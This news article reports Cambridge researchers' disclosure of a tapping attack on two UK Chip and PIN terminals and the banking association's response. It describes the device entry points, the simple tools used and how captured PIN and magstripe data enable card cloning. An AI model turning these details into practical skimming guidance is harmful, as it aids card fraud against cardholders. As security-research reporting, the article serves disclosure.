subject: Paper clip attack skewers Chip and PIN posted: Fri, 29 Feb 2008 10:19:58 -0000
Paper clip attack skewers Chip and PIN
Tapping up
By John Leyden -> More by this author
Published Wednesday 27th February 2008 17:05 GMT
UK researchers have uncovered a serious flaw in the Chip and PIN
machines that authenticate debit and credit card transactions.
Two of the most popular PIN entry devices (PED) in the UK - the
Ingenico i3300 and Dione Xtreme - are vulnerable to a "tapping
attack", using nothing more sophisticated than a paper clip, a needle
and a small recording device.
This basic kit enabled University of Cambridge Computer Labs
researchers to record data exchanged between a card and the device's
processor without triggering tamper-proofing mechanisms. The devices
analysed by the team were borrowed from merchants, but they can also
be purchased online for as little as $20.
In a technical paper (PDF) the researchers explain that in both PIN
entry devices they examined the secure storage for cryptographic keys
is well protected. However, in each case it is possible to tap the
data line between the card and the PIN Entry device's processor. The
data exchanged on this line is not encrypted so the problem becomes
one of getting physical access to the link and of hiding this covert
snooping.
The Ingenico PED includes 1mm holes that provide access to a printed
circuit board using a bent paper clip. "This can be inserted through
a hole in the plastic surrounding the internal compartment, and does
not leave any external marks," the Cambridge researchers explain.
Handily the Ingenico PED provides a concealed compartment designed
for the insertion of optional SIM-sized cards to expand its
functionality. The compartment is not intended to be tamper-proof and
provides a concealed compartment to hide the wiretap, if not direct
access to the circuit board.
The Dione PED does not provide a concealed compartment to hide the
wiretap, but is still vulnerable. The Cambridge researchers drilled a
0.8mm hole from the rear, through which they inserted a 4 cm needle
into a flat ribbon connector socket. A thin wire connection from this
link and interfaced by a small board could be used to send entered
data to a laptop.
The Cambridge researchers conclude that the attack is far easier to
pull off than the banking industry claims:
"What should have required $25,000 needed just a bent paper clip, a
needle, a short length of wire and some creative thinking; attaching
them to the data line takes minutes with some practice. A small FPGA
or microcontroller board with some non-volatile memory can easily fit
inside the Ingenico PEDīs compartment and record transaction details
without the cardholderīs knowledge, while a wire routed from the back
of a mounted Dione PED to a recorder under the counter will not be
detected unless the cardholder conducts a very close inspection - and
knows what to look for."
"The recording circuit can be very small and either battery operated
or attached to the PEDīs power supply; with a full transaction
requiring about 1 kB of storage, even a small memory can record
thousands of transactions. Detecting such a tap from within the PED
is extremely difficult, since high input impedance probes do not
significantly distort signals, and proper termination suppresses
reflections."
"This attack can capture the cardīs PIN because UK banks have opted
to issue cheaper cards that do not use asymmetric cryptography to
encrypt data between the card and PED," the Cambridge researchers
note.
A demo of the attack (video here) featured on UK news programme
Newsnight on Tuesday.
It gets worse. To ensure backward compatibility, PIN entry devices
read data on magnetic strips, as well as on chips on newer credit
cards. Hackers tapping into the link between a card and the
processing device could get all the data needed to make a cloned
card. Add in the corresponding PIN, and fraudsters could withdraw
cash at the many ATMs overseas not upgraded to read chips and
therefore solely reliant on easily-fakeable magnetic stripes.
Tampered PIN entry devices have already been used for fraud. Last
December, Ģ80,000 was stolen from 1,500 people in Leicestershire when
crooks cloned their cards using a doctored device in a local petrol
station.
The process to determine PIN reader security is substandard, the
Cambridge team argues. Evaluation should be more open and defective
devices should be refused certification, they say..
The Cambridge Chip and PIN scenarios pose little threat in the real
world, according to APACS, the banking association which spearheaded
the introduction of Chip and PIN in the UK. "The types of attack on
PIN entry devices detailed in this report are difficult to undertake
and not currently economically viable for a fraudster to carry out,"
a spokesman said.
Ross Anderson, a member of the research team and professor of
security engineering at Cambridge, said: "The lessons we learned are
not limited to banking. Other fields, from voting machines to
electronic medical record systems, suffer from the same combination
of stupid mistakes, sham evaluations and obstructive authorities.
Where the public are forced to rely on the security of a system, we
need honest security evaluations that are published and subjected to
peer review."
The Cambridge team presents its findings in full in May at the IEEE
Symposium on Security and Privacy conference in Oakland, California.
Anderson's colleagues are Saar Drimer and Steven Murdoch.
